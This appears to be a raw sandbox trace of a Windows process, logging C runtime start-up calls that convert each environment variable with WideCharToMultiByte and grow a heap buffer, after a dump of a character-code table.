!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¢Â\x03d\x14í\x18", lpUsedDefaultChar=0x0) returned 256 [0028.565] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0028.565] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x405c62 [0028.601] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713f18) returned 0x80 [0028.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0028.612] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1f) returned 0x711270 [0028.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x711270, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0028.624] GetLastError () returned 0x0 [0028.624] SetLastError (dwErrCode=0x0) [0028.624] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x4) returned 0x713fa0 [0028.624] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0x4 [0028.624] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0x8) returned 0x713fa0 [0028.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0028.624] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x36) returned 0x712b70 [0028.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x712b70, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0028.624] GetLastError () returned 0x0 [0028.624] SetLastError (dwErrCode=0x0) [0028.624] GetLastError () returned 0x0 [0028.624] SetLastError (dwErrCode=0x0) [0028.624] GetLastError () returned 0x0 [0028.624] SetLastError (dwErrCode=0x0) [0028.629] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0x8 [0028.629] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0xc) returned 0x713fa0 [0028.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0028.629] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x37) returned 0x712bb0 [0028.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x712bb0, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0028.629] GetLastError () returned 0x0 [0028.629] SetLastError (dwErrCode=0x0) [0028.630] GetLastError () returned 0x0 [0028.630] SetLastError (dwErrCode=0x0) [0028.630] GetLastError () returned 0x0 [0028.630] SetLastError (dwErrCode=0x0) [0028.630] GetLastError () returned 0x0 [0028.630] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0xc [0028.630] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0x10) returned 0x713fa0 [0028.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0028.630] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3c) returned 0x7067d0 [0028.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x7067d0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0028.630] GetLastError () returned 0x0 [0028.630] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0x10 [0028.630] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0x14) returned 0x713fa0 [0028.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0028.630] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x31) returned 0x712bf0 [0028.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x712bf0, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0028.630] GetLastError () returned 0x0 [0028.630] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0x14 [0028.630] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0x18) returned 0x713fa0 [0028.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0028.630] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x17) returned 0x7078c8 [0028.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x7078c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0028.630] GetLastError () returned 0x0 [0028.630] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0x18 [0028.630] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0x1c) returned 0x713fa0 [0028.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0028.630] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x24) returned 0x70cd38 [0028.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x70cd38, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0028.630] GetLastError () returned 0x0 [0028.630] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0x1c [0028.630] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0x20) returned 0x713fa0 [0028.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0028.630] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x14) returned 0x7078e8 [0028.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x7078e8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0028.630] GetLastError () returned 0x0 [0028.631] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0x20 [0028.631] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0x24) returned 0x713fa0 [0028.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0028.631] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xd) returned 0x7109c0 [0028.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x7109c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0028.631] GetLastError () returned 0x0 [0028.631] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0x24 [0028.631] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0x28) returned 0x713fa0 [0028.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0028.631] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x25) returned 0x70cd68 [0028.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x70cd68, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0028.631] GetLastError () returned 0x0 [0028.631] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0x28 [0028.631] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0x2c) returned 0x713fa0 [0028.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0028.631] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x39) returned 0x706818 [0028.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x706818, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0028.631] GetLastError () returned 0x0 [0028.631] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0x2c [0028.631] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0x30) returned 0x713fa0 [0028.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0028.631] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x18) returned 0x707908 [0028.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x707908, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0028.631] GetLastError () returned 0x0 [0028.631] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0x30 [0028.631] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0x34) returned 0x713fa0 [0028.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0028.631] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x17) returned 0x707928 [0028.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x707928, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0028.631] GetLastError () returned 0x0 [0028.631] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0x34 [0028.632] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0x38) returned 0x713fa0 [0028.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0028.632] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xe) returned 0x7109d8 [0028.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x7109d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0028.632] GetLastError () returned 0x0 [0028.632] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0x38 [0028.632] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0x3c) returned 0x713fa0 [0028.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0028.632] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x69) returned 0x712c30 [0028.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x712c30, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0028.632] GetLastError () returned 0x0 [0028.632] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0x3c [0028.632] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0x40) returned 0x713fa0 [0028.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0028.632] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3e) returned 0x706860 [0028.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x706860, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0028.632] GetLastError () returned 0x0 [0028.632] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713fa0) returned 0x40 [0028.632] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713fa0, Size=0x44) returned 0x712ca8 [0028.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0028.632] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1b) returned 0x711298 [0028.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x711298, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0028.632] GetLastError () returned 0x0 [0028.632] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x44 [0028.632] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x48) returned 0x712ca8 [0028.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0028.632] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1d) returned 0x7112c0 [0028.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x7112c0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0028.632] GetLastError () returned 0x0 [0028.632] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x48 [0028.632] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x4c) returned 0x712ca8 [0028.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 94 Stepping 3, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0028.632] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x48) returned 0x7090c0 [0028.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 94 Stepping 3, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x7090c0, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 94 Stepping 3, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0028.632] GetLastError () returned 0x0 [0028.633] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x4c [0028.633] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x50) returned 0x712ca8 [0028.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0028.633] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x12) returned 0x707948 [0028.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x707948, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0028.633] GetLastError () returned 0x0 [0028.633] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x50 [0028.633] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x54) returned 0x712ca8 [0028.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5e03", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0028.633] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x18) returned 0x707968 [0028.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5e03", cchWideChar=-1, lpMultiByteStr=0x707968, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5e03", lpUsedDefaultChar=0x0) returned 24 [0028.633] GetLastError () returned 0x0 [0028.633] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x54 [0028.633] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x58) returned 0x712ca8 [0028.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0028.633] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1b) returned 0x7112e8 [0028.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x7112e8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0028.633] GetLastError () returned 0x0 [0028.633] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x58 [0028.633] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x5c) returned 0x712ca8 [0028.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0028.633] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x24) returned 0x70cd98 [0028.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x70cd98, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0028.633] GetLastError () returned 0x0 [0028.633] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x5c [0028.633] 